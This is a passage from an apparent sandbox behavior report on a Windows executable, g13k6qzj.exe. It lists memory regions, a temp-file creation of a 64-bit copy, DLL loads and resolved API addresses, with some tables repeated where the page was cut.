| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-12 16:14:27 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #53: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #53 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:02:24, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x35c |
| Parent PID | 0xd74 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FD8
0x
F0C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0062ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00580000 | 0x005a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0062ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000630000 | 0x00630000 | 0x007b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x00940fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000950000 | 0x00950000 | 0x01d4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74680000 | 0x74711fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
